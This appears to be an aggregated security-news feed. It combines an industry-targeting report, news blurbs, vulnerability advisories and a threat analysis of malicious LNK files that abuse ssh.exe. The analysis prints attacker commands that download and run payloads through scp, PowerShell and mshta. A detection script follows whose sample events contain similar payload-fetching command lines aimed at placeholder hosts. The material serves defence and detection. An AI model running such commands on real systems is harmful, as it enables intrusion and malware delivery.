Major Threats:
Espionage: Stealing sensitive data for strategic or financial advantage.
DDoS Attacks: Overwhelming systems to disrupt public services.

Mitigation Strategies:
Government entities need to prioritize inter-agency collaboration and establish centralized cybersecurity frameworks. Investments in AI-based threat intelligence platforms and public-private partnerships can also bolster resilience against sophisticated attacks.

2. Energy and Utilities: The Backbone of Critical Infrastructure

The energy and utilities sector plays a pivotal role in national economies and security. This makes it a frequent target for both cybercriminals and nation-state actors, with attacks often aiming to disrupt critical infrastructure.

Major Threats:
ICS Attacks: Compromise of control systems can lead to widespread outages.
Supply Chain Attacks: Threat actors exploit vulnerabilities in third-party vendors to infiltrate systems.

Mitigation Strategies:
To protect against these threats, the sector must prioritize ICS cybersecurity by segmenting operational networks from IT networks.
Enhanced supply chain scrutiny, robust third-party risk management to monitor vendor vulnerabilities, and partnerships with government cybersecurity agencies can further strengthen defenses against advanced threats.

3. Healthcare: Where Lives and Data Intersect

The healthcare industry is one of the fastest-growing targets for cybercriminals, with a staggering 180% increase in ransomware and database leak incidents compared to 2023. Patient safety, critical care, and sensitive medical data make this sector highly lucrative for attackers.

Major Threats:
Ransomware: Delays in accessing medical records can have life-threatening consequences.
Database Leaks: Leaked patient records often lead to identity theft and insurance fraud.

Mitigation Strategies:
Healthcare organizations must adopt a layered security approach, including data encryption, multi-factor authentication, and comprehensive employee training programs to detect phishing attempts. Regular cybersecurity drills and incident response planning are also essential.

4. Manufacturing: The Cornerstone of Global Supply Chains

The manufacturing sector leads the list, experiencing an alarming 377 confirmed attacks in the first half of 2024 alone. Manufacturing remains vital to the global economy, and its reliance on interconnected systems, including Industrial Control Systems (ICS), exposes it to significant risks.

Major Threats:
Ransomware: By locking critical systems and demanding high ransoms, ransomware attacks in manufacturing can lead to halted production lines, financial losses, and delayed supply chains.
Database Leaks: Intellectual property, design data, and supply chain information have been prime targets for data exfiltration.

Mitigation Strategies:
To mitigate these threats, manufacturers should prioritize securing Industrial Control Systems (ICS) by isolating critical systems, conducting regular vulnerability assessments, and adopting robust endpoint protection solutions.
Additionally, incorporating advanced network monitoring tools like Cyble Vision can help detect anomalies before they escalate into breaches.

5. Financial Services: A Prime Target for Monetary Gain

The financial services sector consistently ranks among the most targeted industries due to its access to funds and sensitive customer data. In 2024, cybercriminals have adopted sophisticated tactics, leveraging advanced persistent threats (APTs) and exploiting insider vulnerabilities.

Major Threats:
Ransomware: Demands for multimillion-dollar payments are becoming routine.
Cryptocurrency Exploits: Attackers target blockchain systems and exchanges to siphon off digital assets.
Phishing and Social Engineering: Deceptive tactics to gain unauthorized access to accounts.

Mitigation Strategies:
To combat these threats, financial institutions must deploy state-of-the-art AI-driven Threat Intelligence tools. These tools can identify anomalous patterns indicative of fraud or cyberattacks. Additionally, implementing strict access controls and conducting regular security audits are crucial for minimizing risk.

6. Professional Services: Custodians of Confidential Data

Professional service firms, including law, accounting, and consulting firms, have witnessed a 15% uptick in cyberattacks compared to 2023. These organizations store highly sensitive client data, making them attractive to threat actors.

Major Threats:
Ransomware: Disruption in service delivery can damage client relationships.
Database Leaks: Exposed data can lead to legal liabilities and reputational damage.

Mitigation Strategies:
Firms should enforce strict data access controls and encrypt all client information. Regular penetration testing and vulnerability scans can help identify weaknesses before attackers exploit them. Moreover, adopting secure communication platforms can safeguard sensitive exchanges.

7. Technology: Guardians of Innovation

Technology companies, encompassing software developers, IT services, and hardware manufacturers, remain high-value targets. Although a slight decline in attacks was noted in 2024, this sector is still vulnerable due to the sensitivity of its intellectual property.

Major Threats:
Data Breaches: Proprietary technology, source codes, and user data are often exfiltrated.
Ransomware: Cybercriminals lock critical software systems, halting innovation pipelines.

Mitigation Strategies:
Incorporating advanced AI-driven cybersecurity solutions can detect and neutralize threats in real-time. Technology firms should also implement bug bounty programs to uncover vulnerabilities before malicious actors exploit them.

8. Retail and E-commerce: A Treasure Trove of Consumer Data

Retailers and e-commerce platforms process massive volumes of personal and payment information, making them a lucrative target for threat actors. In 2024, both online and physical operations have faced increased attacks.

Major Threats:
POS Malware: Point-of-sale systems are compromised to steal cardholder data.
Credential Stuffing: Attackers exploit reused passwords to breach user accounts.

Mitigation Strategies:
Retail businesses must adopt end-to-end encryption for payment data, deploy multi-factor authentication for account access, and regularly monitor systems for unusual activity. Cybersecurity awareness campaigns targeting both employees and customers can further reduce risks.

9. Education: Hubs of Knowledge and Innovation

Educational institutions, particularly universities, are increasingly targeted for their intellectual property, personal data, and operational vulnerabilities. Attackers often aim to disrupt operations or monetize stolen data on the dark web.

Major Threats:
Dark Web Exploitation: Selling stolen academic research and personal data.
DDoS Attacks: Crippling online learning platforms and administrative systems.
Mitigation Strategies:
Educational institutions must implement robust cybersecurity frameworks, including identity management systems and regular security awareness training. Strong network segmentation and frequent system updates can also help reduce exposure to cyber threats.

10. Small Businesses: The Underdogs in Cybersecurity

Small and medium-sized businesses (SMBs) are often perceived as easy targets due to their limited cybersecurity budgets and expertise. Despite their size, the impact of a breach on SMBs can be devastating.

Major Threats:
Phishing: Cybercriminals manipulate employees to gain access to sensitive data.
Ransomware: Locking systems and demanding ransoms can cripple operations.

Mitigation Strategies:
SMBs should focus on implementing basic yet effective cybersecurity measures, such as routine software updates, secure data backup solutions, and employee training programs to recognize phishing attempts. Outsourcing cybersecurity to managed service providers (MSPs) can also offer cost-effective protection.

Emerging Trends in Cybersecurity Attacks Across Industries

While the above industries remain top targets, certain emerging trends in cyberattacks warrant attention across sectors:

Supply Chain Vulnerabilities: Attackers increasingly target third-party vendors to infiltrate larger organizations.
AI-Driven Threats: Threat actors are using AI to automate attacks and evade traditional security measures.
Deepfake and Impersonation Scams: These new-age tactics are used to manipulate trust and extract sensitive information.

Key Takeaways for 2024

Ransomware Dominates: Nearly every industry has faced ransomware attacks, underscoring the need for robust backup and recovery strategies.
Employee Awareness is Crucial: Phishing and social engineering remain the primary methods of attack. Training employees to recognize these threats can significantly reduce risks.
AI-Powered Defense is Essential: As attackers become more sophisticated, industries must leverage AI and machine learning to stay ahead.

Conclusion

The evolving cyber threat landscape in 2024 underscores the importance of vigilance, innovation, and collaboration in cybersecurity. Whether it is the manufacturing sector grappling with ICS vulnerabilities or small businesses struggling with limited resources, all industries must adopt a proactive stance. By prioritizing security investments, fostering a culture of awareness, and leveraging cutting-edge technologies, organizations can safeguard their operations, customers, and reputations in an increasingly connected world.

The road ahead demands resilience, adaptability, and a unified effort against cyber adversaries. Let 2025 be a year of strengthened defenses and collective action to combat the relentless tide of cyber threats.

The post Top 10 Industries Targeted by Threat Actors in 2024 appeared first on Cyble.

by CYBLE

The Computer Emergency Response Team of Ukraine (CERT-UA) warns that the threat actor UAC-0125 abuses Cloudflare Workers services to target the Ukrainian army with Malware. The Computer Emergency Response Team of Ukraine (CERT-UA) warns that the threat actor UAC-0125 exploits Cloudflare Workers to target the Ukrainian military, spreading malware disguised as the mobile app Army+ […]

by Security Affairs

This post is the result of research into the real-world application of the Bring Your Own Vulnerable Driver (BYOVD) technique along with Cisco Talos’ series of posts about  malicious Windows drivers.

by Cisco Talos Blog

On November 29th, 2024, Black Friday, shoppers flooded online stores to grab the best deals of the year. But while consumers were busy filling their carts, cyber criminals were also seizing the opportunity to exploit the shopping frenzy. Our system detected a significant surge in Gozi malware activity, targeting financial institutions across North America. The […] The post Black Friday chaos: The return of Gozi malware appeared first on Security Intelligence.

by Security Intelligence

A free VPN app called Big Mama is selling access to people’s home internet networks. Kids are using it to cheat in a VR game while researchers warn of bigger security risks.

by WIRED Security News

The threat intelligence firm observed deployment of backdoors, but has not seen mass data theft thus far.

by Cybersecurity Dive

Juniper Networks says a Mirai botnet is ensnaring session smart router devices that are using default passwords. The post Juniper Warns of Mirai Botnet Targeting Session Smart Routers appeared first on SecurityWeek.

by SecurityWeek

Privileged access management company BeyondTrust suffered a cyberattack in early December after threat actors breached some of its Remote Support SaaS instances. [...]

by BleepingComputer

The bank “negligently made” materially misleading statements after a hack that resulted in the theft of 1.5 million customers’ personally identifiable information.

by Cybersecurity Dive

Privacy-enhanced alternatives to Office, WhatsApp and Evernote for Christmas and New Year gifts.

by Kaspersky

Lazarus targets employees of a nuclear-related organization with a bunch of malware, such as MISTPEN, LPEClient, RollMid, CookieTime and a new modular backdoor CookiePlus.

by Securelist

Ukrainian national Mark Sokolovsky was sentenced to 60 months in federal prison for one count of conspiracy to commit computer intrusion. According to court documents, he conspired to operate the Raccoon Infostealer as a malware-as-a-service (MaaS). Individuals who deployed Raccoon Infostealer to steal data from victims leased access to the malware for approximately $200 per month, paid for by cryptocurrency. These individuals used various ruses, such as email phishing, to install the malware onto the … More → The post Ukrainian hacker gets prison for infostealer operations appeared first on Help Net Security.

by Help Net Security

by ComputerWeekly

Overview

Starting this year, Cyble Research and Intelligence Labs (CRIL) has observed a significant trend where threat actors (TAs) have increasingly leveraged LNK files as an initial infection vector in multiple campaigns. These malicious shortcut files, often disguised as legitimate documents, have become a preferred entry point for attackers seeking to compromise systems. This shift in tactics aims to bypass traditional security mechanisms and deceive users into executing the malicious LNK file, thereby initiating a multi-stage cyber attack to deploy the final payload.

In these campaigns, the LNK files are meticulously crafted to execute commands using multiple Living-off-the-Land Binaries (LOLBins). By exploiting the inherent functionalities of these binaries, attackers can download or execute additional malicious components, thereby advancing their attack chain. While modern endpoint detection and response (EDR) solutions have evolved to detect such activities by monitoring the behavior of LNK files and flagging suspicious use of known LOLBin binaries, this has led TAs to refine their techniques to bypass these advanced security measures.

Recently, CRIL uncovered an additional layer of sophistication in these attacks: the use of SSH commands within malicious LNK files to execute a range of malicious activities. This emerging technique highlights how threat actors leverage SSH commands to maintain persistence and control over compromised systems. While the malicious use of SSH is not a new tactic, its ongoing relevance as an evasion technique underscores the need for continuous vigilance in monitoring trusted utilities for anomalous behavior. Pivoting on the identified SSH abuse techniques, CRIL has tracked several campaigns where SSH commands were exploited to carry out malicious operations, further emphasizing the evolution of attack methods.
Notably, APT groups have also incorporated this technique into their arsenal, highlighting its growing use in sophisticated cyber campaigns.

SSH using the SCP command

In this campaign, a malicious .LNK file is configured to execute SSH commands that use the scp (Secure Copy Protocol) command to download a malicious file and execute it on the local system. The image below illustrates the contents of the .LNK file.

Figure 1 - Contents of the .LNK file

The use of SSH commands and SCP on Windows systems is relatively uncommon, which may allow malicious activity to go undetected by traditional security solutions that are not specifically configured to monitor such behavior. The .LNK file is configured with the following SSH options to facilitate the attack:

-o "PermitLocalCommand=yes": Allows the execution of a local command once the SSH connection is established.
-o "StrictHostKeyChecking=no": Disables host key verification, bypassing prompts or errors when connecting to untrusted servers.

The SSH client executes the SCP command below:

scp root@17.43.12.31:/home/revenge/christmas-sale.exe c:\users\public\

This command downloads a malicious file named christmas-sale.exe from the /home/revenge directory on the remote server to the local directory c:\users\public\. The downloaded file is then executed, advancing the attack chain.

Abuse of SSH and PowerShell Commands

In this campaign, a malicious .LNK file is configured to execute an SSH command that indirectly runs a malicious PowerShell command. The .LNK file utilizes a ProxyCommand option in the SSH command to execute PowerShell, which then invokes mshta.exe to access a remote malicious URL. The execution of this command allows the attacker to download and execute a potentially harmful payload on the local system. The image below shows the contents of the .LNK file.

Figure 2 - Contents of the .LNK File

The .LNK file is configured with the following SSH options:

-o ProxyCommand="powershell powershell -Command ('mshta.exe hxxps[:]//www.google.ca/amp/s/goo.su/IwPQJP'

The SSH client executes the PowerShell command, which runs mshta.exe to fetch and execute the malicious script from the specified URL.

Abuse of SSH and CMD Commands

In this campaign, a malicious .LNK file is crafted to execute an SSH command, which then triggers rundll32 to load a malicious DLL and launch a PDF file (lure document), both located in the current directory. The image below illustrates the contents of the .LNK file.

Figure 3 - Contents of the LNK file

The SSH client executes cmd.exe, which in turn launches the rundll32 utility to load the malicious DLL and execute the PDF, advancing the attack chain. By analyzing the artifacts and DLL payload associated with this campaign, we observed behavior resembling stealer malware compiled in Go, which we previously discussed in a blog targeting the Indian Air Force. Additionally, another article highlights similar behavior, attributing the stealer payload (HackBrowserData—an open-source tool) to the APT group 'Transparent Tribe'.

Conclusion

The combination of LNK files and SSH commands has emerged as a notable trend in recent campaigns, signaling a shift in the tactics used by threat actors. By leveraging SSH commands in conjunction with various LOLBins, attackers can establish connections to remote servers, download payloads, and maintain persistence on compromised systems. As demonstrated in the analyzed campaigns, these techniques are continuously evolving, with threat actors refining their methods to evade detection by exploiting trusted system utilities. As the cyber threat landscape progresses, organizations must remain vigilant and adapt their security strategies to effectively counter these increasingly sophisticated attack vectors.
The Sigma rule to detect these campaigns leveraging SSH commands is available for download from the GitHub repository.

Recommendations

To mitigate potential SSH abuse, closely monitor the activities of the legitimate SSH utility, restrict its usage to authorized users, and implement robust detection mechanisms to identify suspicious activities involving ssh.exe, particularly those with abnormal or malicious command-line parameters.
Disable OpenSSH features on systems where it is not required.

Indicators of Compromise (IoCs)

Indicator  Indicator Type  Description
8bd210b33340ee5cdd9031370eed472fcc7cae566752e39408f699644daf8494  SHA-256  Lnk file – Campaign 1
5b6dc2ecb0f7f2e1ed759199822cb56f5b7bd993f3ef3dab0744c6746c952e36  SHA-256  Lnk file – Campaign 2
0016e1ec6fc56e4214e7d54eb7ab3d84a4a83b4befd856e984d77d6db8fc221d  SHA-256  Lnk file – Campaign 3

References
https://redsiege.com/blog/2024/04/sshishing-abusing-shortcut-files-and-the-windows-ssh-client-for-initial-access/
https://blogs.blackberry.com/en/2024/05/transparent-tribe-targets-indian-government-defense-and-aerospace-sectors
https://blog.eclecticiq.com/operation-flightnight-indian-government-entities-and-energy-sector-targeted-by-cyber-espionage-campaign

The post LNK Files and SSH Commands: A Stealthy Playbook for Advanced Cyber Attacks appeared first on Cyble.
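The recommendation above asks for detection of ssh.exe launched with abnormal command-line parameters. The following Python triage script is an added example written for this page; it is not Cyble's Sigma rule and not code from the original post. It scores process-creation events for the three option names the campaigns abused (PermitLocalCommand, LocalCommand, ProxyCommand), treats StrictHostKeyChecking=no as a weaker signal because automation uses it legitimately, and adds weight when a LOLBin from the write-up (powershell, mshta, cmd.exe, rundll32, scp) appears inside the ssh command line. The sample events, hosts, file names and the scoring weights are constructed assumptions for illustration; the explorer.exe parent heuristic is likewise an assumption, not something the post states.

```python
"""Triage ssh.exe process-creation events for the LNK/SSH abuse pattern.

Added example for this page. Sample events and scoring weights are constructed
assumptions; this is not Cyble's Sigma rule.
"""
import re
from dataclasses import dataclass, field

# Option names the write-up observed in .LNK-launched ssh.exe invocations.
HIGH_RISK_OPTIONS = {"permitlocalcommand", "localcommand", "proxycommand"}
# Disabling host-key checks is routine in automation, so alone it is only a weak signal.
WEAK_OPTIONS = {"stricthostkeychecking"}
# Trusted Windows utilities the campaigns chained behind ssh; none belongs inside an ssh option value.
LOLBIN_MARKERS = ("powershell", "mshta", "cmd.exe", "rundll32", "scp ")

# Matches the "-o Key=", "-o "Key=" and "-oKey=" spellings of the OpenSSH option flag.
OPTION_RE = re.compile(r'-o\s*"?(\w+)\s*=', re.IGNORECASE)


@dataclass
class Finding:
    pid: int
    score: int
    reasons: list = field(default_factory=list)


def ssh_options(cmdline: str) -> set:
    """Lower-cased names of every -o KEY=VALUE option on an ssh command line."""
    return {m.group(1).lower() for m in OPTION_RE.finditer(cmdline)}


def triage(pid: int, cmdline: str, parent: str = "") -> Finding:
    """Score one ssh.exe process-creation event; the weights are assumptions for illustration."""
    finding = Finding(pid=pid, score=0)
    lowered = cmdline.lower()
    for opt in sorted(ssh_options(cmdline)):
        if opt in HIGH_RISK_OPTIONS:
            finding.score += 3
            finding.reasons.append(f"option {opt} makes the ssh client run a local command")
        elif opt in WEAK_OPTIONS:
            finding.score += 1
            finding.reasons.append(f"option {opt} disables host key verification")
    for marker in LOLBIN_MARKERS:
        if marker in lowered:
            finding.score += 3
            finding.reasons.append(f"LOLBin '{marker.strip()}' embedded in ssh command line")
    # A shortcut double-clicked by a user is started by explorer.exe; an assumed heuristic, not a rule.
    if parent.lower().endswith("explorer.exe"):
        finding.score += 1
        finding.reasons.append("parent is explorer.exe (consistent with an LNK launch)")
    return finding


def analyze(events, threshold: int = 4):
    """Return a Finding for every ssh.exe event whose score reaches the threshold."""
    flagged = []
    for ev in events:
        if not ev["image"].lower().endswith("ssh.exe"):
            continue
        f = triage(ev["pid"], ev["cmdline"], ev.get("parent", ""))
        if f.score >= threshold:
            flagged.append(f)
    return flagged


# Constructed process-creation events; hosts, paths and file names are placeholders, not IoCs.
SSH = r"C:\Windows\System32\OpenSSH\ssh.exe"
SAMPLE_EVENTS = [
    {"pid": 1001, "image": SSH, "parent": "git.exe",
     "cmdline": "ssh.exe -T git@github.com"},
    {"pid": 1002, "image": SSH, "parent": "jenkins-agent.exe",
     "cmdline": "ssh.exe -o StrictHostKeyChecking=no build@ci.example.invalid uptime"},
    # Shape of campaign 1: PermitLocalCommand plus a LocalCommand that runs scp.
    {"pid": 1003, "image": SSH, "parent": r"C:\Windows\explorer.exe",
     "cmdline": r'ssh.exe -o "PermitLocalCommand=yes" -o "StrictHostKeyChecking=no" '
                r'-o "LocalCommand=scp root@203.0.113.10:/tmp/update.exe c:\users\public\" root@203.0.113.10'},
    # Shape of campaign 2: ProxyCommand handing off to PowerShell and mshta.
    {"pid": 1004, "image": SSH, "parent": r"C:\Windows\explorer.exe",
     "cmdline": 'ssh.exe -o ProxyCommand="powershell -Command mshta.exe https://lure.example.invalid/x" nobody@localhost'},
    # Shape of campaign 3: ProxyCommand running cmd.exe and rundll32 from the current directory.
    {"pid": 1005, "image": SSH, "parent": r"C:\Windows\explorer.exe",
     "cmdline": r'ssh.exe -o ProxyCommand="cmd.exe /c rundll32 .\helper.dll,Run & start lure.pdf" nobody@localhost'},
]

if __name__ == "__main__":
    for f in analyze(SAMPLE_EVENTS):
        print(f.pid, f.score, "; ".join(f.reasons))
```

Run against the constructed events, the two benign invocations (a git fetch and a CI job that only disables host-key checking) stay below the threshold, while the three campaign-shaped command lines are flagged with the option name and the embedded LOLBin named in the reasons. In production the same logic would read Sysmon or EDR process-creation events, and the explorer.exe heuristic should be tuned per environment.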

by CYBLE

Netwrix released a new version of its SaaS platform, Netwrix 1Secure. The latest version builds on its existing security monitoring functionality with more robust access rights assessment and expanded security auditing capabilities to overcome the lack of control when relying only on native security tools in Microsoft 365. Netwrix 1Secure helps customers promote a secure IT environment with the following added functionality: Risky permissions identification in SharePoint Online. Reporting on permissions provides actionable insights to … More → The post Netwrix 1Secure enhances protection against data and identity access risks appeared first on Help Net Security.

by Help Net Security

The agency’s recommendations are not for the technically inept. Yet the extraordinary measures, including the use of encrypted apps, are applicable to all audiences.

by Cybersecurity Dive

NetSPI introduced three tiers of external attack surface management (EASM) solutions, delivered through The NetSPI Platform. The new offerings address the evolving needs of NetSPI’s global customer base, to move toward a continuous threat exposure management (CTEM) model and proactive security posture. “To outpace today’s adversaries, organizations need continuous discovery, assessment and controls validation of their attack surfaces,” said Tom Parker, CTO at NetSPI. “Our EASM offerings equip security teams with comprehensive visibility, powerful … More → The post NetSPI introduces external attack surface management solutions appeared first on Help Net Security.

by Help Net Security

Git, repositories and pipelines…oh my! We unpack standard practices in the web app development process and provide guidance on how to use Tenable Web Application Scanning to secure your code.

Awesome! This should be easy. All you need to start is … Wait… what's a pipeline?

Well, let's start there. Have you ever used a code repository to track code changes? Every time you make an update to the repository files/code, you have to do what's called a “git commit” and “git push.” Developers use Git as a foundation to run their CI/CD pipelines.

Wait … what's Git, and what does CI/CD mean?

To be clear, continuous integration and continuous deployment (CI/CD) is a methodology — not a tool. The “D” in CI/CD is often referred to as “delivery” instead of deployment. For the purposes of this blog post, since we are talking about the deployment side of it, I will use that here.

Before we get there, let's talk about version control. Time to roll back a few years. In 2005, Linus Torvalds, the creator of Linux, built something called “Git,” an open source version control software. Version control allows you to track and control all changes to a codebase. These codebases, called repositories, are generally used for managing code that is the basis for any software or website that you can think of.

Git is the most commonly used version control system, while GitHub, now owned by Microsoft, is one of the cloud-based repository hosting platforms utilizing Git.

Developers have been using this great version control tool ever since, but every time they wanted to test their production applications/software, they had to do the following:

1. Log on to a server
2. Pull code from a repository
3. Package code up in a nice zip-type file
4. Send that package to another server that was the staging/testing environment
5. Run the application and confirm it still runs at all
6. Run any tests needed against it, such as allowing other developers to come in and poke at it to find broken parts of the application

The most efficient developers would make scripts to automate some or all of this work, but there was an even better way…

Source: Tenable, December 2024

What is continuous integration?

Integration here might not mean what it sounds like. It means that you are building your application and running tests on a schedule or every single time you make a change to your code. Think about how much time this can save. Instead of having to assign tasks out to a team of testers, those tests run every time you change the code. Can you imagine knowing about all of your issues right away?

On top of that, continuous integration automatically builds your application, so you don't have to package and run it yourself, letting you keep working on building.

For security pros, this is the spot in a pipeline where the dynamic application security testing (DAST) scanner — available in Tenable Web Application Scanning — can help. At Tenable, we want developers to know about security issues as soon as possible. For reference, this is where software composition analysis (SCA) and static application security testing (SAST) scanning also live. Those tools are used for looking at source code, whereas Tenable Web Application Scanning looks at a built application and scans it with real network requests.

Jenkins is considered the first main and widely adopted CI tool. Jenkins helped teams adopt this methodology. Some teams were already doing this with homegrown solutions. We have documentation on how to deploy the web app scanner in a Jenkins CI/CD pipeline.

What is continuous deployment?

Deployment is when you take what you have built and push it out for real use. It's building an application for production use rather than just for quick testing. Back in the day, developers would log onto their servers and make updates to the applications on the fly. If something broke, well, you'd better remember the changes you made and have fun spinning that back up.

Automated deployment allowed developers to run one script that would spin up an entire environment or application all in one go. Application falls down? No problem! Run the deployment and it can be back up soon.

Continuous deployment allows for changes to be made in the source code and for those to be automatically sent to production. No dev or IT team time is wasted in changing live servers.

Wrapping it all up

PHEW. Ok. A CI/CD pipeline is where you combine version control (Git), continuous integration and continuous deployment. It allows teams to develop applications very quickly and not waste time. The pipeline is the ongoing stream of tests and automated actions that all happens based on code changes.

Over time, tools became better and more appeared, such as Bamboo and CircleCI and some others. GitHub Actions came out in 2015, allowing developers to automate software development workflows from within GitHub.

Tenable Web Application Scanning can scan any pipeline. It offers code examples for testing for various tools, but you can throw a test into any pipeline. For more documentation on how to implement, see Tenable's Documentation.

Now, back to the original question: So, you want to scan some web apps in the pipeline? You can walk through the “how to run Web App Scans in your CI/CD pipeline” in this public demo: https://demo.tenable.com/share/lajsp7ujjmzb

Learn more

View the on-demand webinar Tenable Web Application Scanning Customer Update, April 2024
Visit the product page, https://www.tenable.com/products/web-app-scanning
Download the data sheet, Vulnerability Exposure: A simple, scalable approach to dynamic application security testing

by Tenable

Ataccama announced enhancements to the Ataccama ONE unified data trust platform v15.4 that enable customers to have confidence in using their data for business-critical decision-making. In this latest release, enhancements include augmenting its AI capabilities, streamlining user experience, and simplifying task management for greater efficiency and cost reduction. The latest edition of Ataccama ONE includes the following new updates: Extended generative AI functionality: Designed for new and non-technical users, the new AI-powered features allow them … More → The post Ataccama ONE platform enhancements accelerate enterprise data quality initiatives appeared first on Help Net Security.

by Help Net Security

Enpass added Single Sign-On (SSO) for its admin console in support for its Business Enterprise customers. Enpass integrates seamlessly with prominent Identity Providers (IDPs) such as Google Workspace, Okta, and Microsoft Entra ID, further enhancing Enpass’s approach to simplifying compliance and security controls for password and credential management. With SSO as an added layer of efficiency for its admin console, Enpass continues to lead in delivering password management solutions that prioritize customer choice and security-first … More → The post Enpass simplifies compliance and security controls for password management appeared first on Help Net Security.

by Help Net Security

The U.S. government may ban TP-Link routers in 2025 if investigations confirm their use could pose a national security risk. The U.S. government is investigating whether TP-Link routers, linked to cyberattacks, pose a national security risk, the Wall Street Journal reported. According to the WSJ, the U.S. government is considering banning TP-Link routers starting in […]

by Security Affairs

As AI adoption accelerates, businesses face rising cloud costs and budget unpredictability, necessitating smarter strategies for resource management, training, and AI-driven optimization.

by ITPro Today

Security teams that subscribe to threat feeds get lists of known malicious domains, IPs, and file signatures that they can leverage to blacklist and prevent attacks from those sources. The post Are threat feeds masking your biggest security blind spot? appeared first on Help Net Security.

by Help Net Security

U.S. enterprises are spending an average of $29M a year on the cloud, driven by AI initiatives, financial optimization, and cloud-native technologies, a Forrester report finds.

by ITPro Today

The number of DDoS-related incidents targeting APIs has jumped by 30x compared with traditional Web assets, suggesting that attackers see the growing API landscape as the more attractive target.

by Dark Reading

We're back with another post about common malware techniques. This time, we are talking about using shared memory sections to inject and execute code in a remote process. This method of process injection uses Windows…

by TrustedSec

This vulnerability allows local attackers to escalate privileges on affected installations of Arista NG Firewall. An attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability. The ZDI has assigned a CVSS rating of 6.6. The following CVEs are assigned: CVE-2024-12831.

by Zero Day Initiative Advisories

This vulnerability allows remote attackers to create arbitrary files and disclose sensitive information on affected installations of Arista NG Firewall. Authentication is required to exploit this vulnerability. The ZDI has assigned a CVSS rating of 8.3. The following CVEs are assigned: CVE-2024-12832.

by Zero Day Initiative Advisories

This vulnerability allows remote attackers to execute arbitrary code on affected installations of Arista NG Firewall. Authentication is not required to exploit this vulnerability. The ZDI has assigned a CVSS rating of 8.1. The following CVEs are assigned: CVE-2024-12830.

by Zero Day Initiative Advisories

This vulnerability allows remote attackers to execute arbitrary code on affected installations of Arista NG Firewall. Authentication is required to exploit this vulnerability. The ZDI has assigned a CVSS rating of 7.2. The following CVEs are assigned: CVE-2024-12829.

by Zero Day Initiative Advisories

This vulnerability allows remote attackers to execute arbitrary code on affected installations of Rockwell Automation Arena Simulation. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The ZDI has assigned a CVSS rating of 7.8. The following CVEs are assigned: CVE-2024-11364.

by Zero Day Initiative Advisories

This vulnerability allows remote attackers to execute arbitrary code on affected installations of Rockwell Automation Arena Simulation. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The ZDI has assigned a CVSS rating of 7.8. The following CVEs are assigned: CVE-2024-11157.

by Zero Day Initiative Advisories

This vulnerability allows remote attackers to execute arbitrary code on affected installations of Rockwell Automation Arena Simulation. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The ZDI has assigned a CVSS rating of 7.8. The following CVEs are assigned: CVE-2024-12175.

by Zero Day Initiative Advisories

This vulnerability allows remote attackers to execute arbitrary code on affected installations of Tibbo Aggregate Network Manager. Authentication is required to exploit this vulnerability. The ZDI has assigned a CVSS rating of 8.8. The following CVEs are assigned: CVE-2024-12700.

by Zero Day Initiative Advisories

This vulnerability allows local attackers to disclose sensitive information on affected installations of AnyDesk. An attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability. The ZDI has assigned a CVSS rating of 5.5. The following CVEs are assigned: CVE-2024-12754.

by Zero Day Initiative Advisories

This vulnerability allows remote attackers to execute arbitrary code on affected installations of Autodesk Navisworks Freedom. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The ZDI has assigned a CVSS rating of 7.8. The following CVEs are assigned: CVE-2024-12200.

by Zero Day Initiative Advisories

This vulnerability allows remote attackers to execute arbitrary code on affected installations of Autodesk Navisworks Freedom. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The ZDI has assigned a CVSS rating of 7.8. The following CVEs are assigned: CVE-2024-12198.

by Zero Day Initiative Advisories

This vulnerability allows remote attackers to execute arbitrary code on affected installations of Autodesk Navisworks Freedom. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The ZDI has assigned a CVSS rating of 7.8. The following CVEs are assigned: CVE-2024-12197.

by Zero Day Initiative Advisories

This vulnerability allows remote attackers to execute arbitrary code on affected installations of Autodesk Navisworks Freedom. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The ZDI has assigned a CVSS rating of 7.8. The following CVEs are assigned: CVE-2024-12179.

by Zero Day Initiative Advisories

This vulnerability allows remote attackers to execute arbitrary code on affected installations of Autodesk Navisworks Freedom. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The ZDI has assigned a CVSS rating of 7.8. The following CVEs are assigned: CVE-2024-12194.

by Zero Day Initiative Advisories

This vulnerability allows remote attackers to execute arbitrary code on affected installations of Autodesk Navisworks Freedom. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The ZDI has assigned a CVSS rating of 7.8. The following CVEs are assigned: CVE-2024-12192.

by Zero Day Initiative Advisories

This vulnerability allows remote attackers to execute arbitrary code on affected installations of Autodesk Navisworks Freedom. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The ZDI has assigned a CVSS rating of 7.8. The following CVEs are assigned: CVE-2024-12191.

by Zero Day Initiative Advisories

This vulnerability allows remote attackers to execute arbitrary code on affected installations of Autodesk Navisworks Freedom. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The ZDI has assigned a CVSS rating of 7.8. The following CVEs are assigned: CVE-2024-12178.

by Zero Day Initiative Advisories

This vulnerability allows remote attackers to execute arbitrary code on affected installations of Autodesk Navisworks Freedom. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The ZDI has assigned a CVSS rating of 7.8. The following CVEs are assigned: CVE-2024-12671.

by Zero Day Initiative Advisories

This vulnerability allows remote attackers to execute arbitrary code on affected installations of Autodesk Navisworks Freedom. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The ZDI has assigned a CVSS rating of 7.8. The following CVEs are assigned: CVE-2024-12670.

by Zero Day Initiative Advisories

This vulnerability allows remote attackers to execute arbitrary code on affected installations of Autodesk Navisworks Freedom. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The ZDI has assigned a CVSS rating of 7.8. The following CVEs are assigned: CVE-2024-12669.

by Zero Day Initiative Advisories

